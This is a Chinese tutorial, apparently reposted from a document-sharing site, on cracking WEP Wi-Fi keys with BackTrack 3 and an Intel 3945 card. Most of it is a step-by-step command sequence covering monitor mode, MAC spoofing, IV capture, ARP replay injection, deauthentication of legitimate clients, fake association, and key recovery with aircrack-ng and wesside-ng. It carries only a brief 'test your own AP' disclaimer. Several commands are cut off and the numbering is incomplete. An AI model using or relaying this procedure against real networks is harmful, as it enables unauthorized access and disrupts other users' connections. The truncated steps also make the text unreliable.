发布时间 : 星期三 文章Intel3945 BT3破解无线WEP更新完毕开始阅读db797f3231126edb6f1a1074
Intel3945 BT3破解无线WEP/WPA教程
本教程用于学习和交流,如要实验请拿自已的AP开刀!! 《BT3破解无线WEP/WPA教程》。
由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理 解的偏差甚至错误,希望各位朋友指正。
最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修 正和完善。
对无线WEP和WPA 破解有兴趣的朋友也可加入QQ一起交流。 谢谢!!
WEP破解
1.装备: IMBX60笔记本(内置Intel3945 无线网卡)、BT3 的U盘系统(需用syslinux命令来指定启动
BT3 的盘符)
2.用户名:root密码:toor,进入图形界面:startx。启动BT3 后,(启动黑屏:xconf再输入startx)
3.加载3945 网卡的驱动。打开一个shell 输入 modprobe –r iwl3945 输入 modprobe ipwraw
注:不同的网卡有不同的加载方式 4. 查找目标:
用Airoscript命令(Backtrack/radio network analysis/80211/all/Aioscript)的扫描功能
连续三次都选择1 发现5个,有4 个加密,data 都是0,开放的netgear 那个AP有一个客户端。PWR
值一般看出信号强度。也可以用airodump-ng wifi0 来搜索
我们选择第一个作为目标,channel为11(上图中的CH 代表信道)。 注:修改自己网卡的MAC地址的命令。 输入macchanger –m 00:11:22:33:44:55 wifi0
5.激活网卡的Monitor模式并工作在11 信道。(加载网卡,激活监听模式,工作在11 信道)
输入 airmon-ng start wifi0 11 也可用iwconfi wifi0 来查看网卡的工作模式和工作信道。
可用aireplay-ng --test wifi0 来测试是否可以注入
6.输入截取数据包命令(截取11 信道的ivs数据包,并保存名为name.ivs)
输入命令 airodump-ng --ivs -w name -c 11 wifi0 ,
(--ivs:仅截取ivs数据包,-w:写入文件,-c:截取ivs的信道) (其中name是获取的ivs 的保存文件的名字,11 是channel值,你根据实际修改)
一. 有客户端WEP 破解
1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。 思路:1-6步同上
7.直接用aircrack-ng破解
第七步: aircrack-ng -n 64 -b
2.有客户端,合法客户端只能产生少量ivs 数据,就需要注入攻击加速产生大量ivs。
只要有少量的数据就可能获得arp 请求包,则可用arp 注入模式的-3 模式通过不断向AP 发送
同样的arp请求包,来进行注入式攻击。 思路:1-6步同上
7.用aireplay-ng的arp注入方式获得大量的ivs
第七步:aireplay-ng -3 -b
3.有客户端,但是客户端根本不在通信,不能产生ARP包。-3注入模式不成功
思路:1-6步同上
7.-0 冲突模式强制断开合法客户端和ap连接,使之重新连接
8.利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
第七步:aireplay-ng -3 -b
输入 modprobe –r iwl3945 输入 modprobe ipwraw 输入airmon-ng start wifi0 11 现在,只要一个命令就搞定,输入:
输入wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的AP MAC)。 很简单吧,密码出来了。 二.无客户端WEP破解 思路:1-6步同上
因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。 这是非常关键的一步。为让AP 接受数据包,必须使自己的网卡和AP 关联。如果没有关联的话,目标AP
将忽略所有从你网卡发送的数据包,IVS数据将不会产生。
第七步:输入 aireplay-ng -1 0 -e
如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种: 1、目标AP做了MAC地址过滤 2、你离目标AP物理距离太远 3、对方使用了WPA加密
5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道 也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上 tcpdump -n -e -s0 -vvv -i wifi0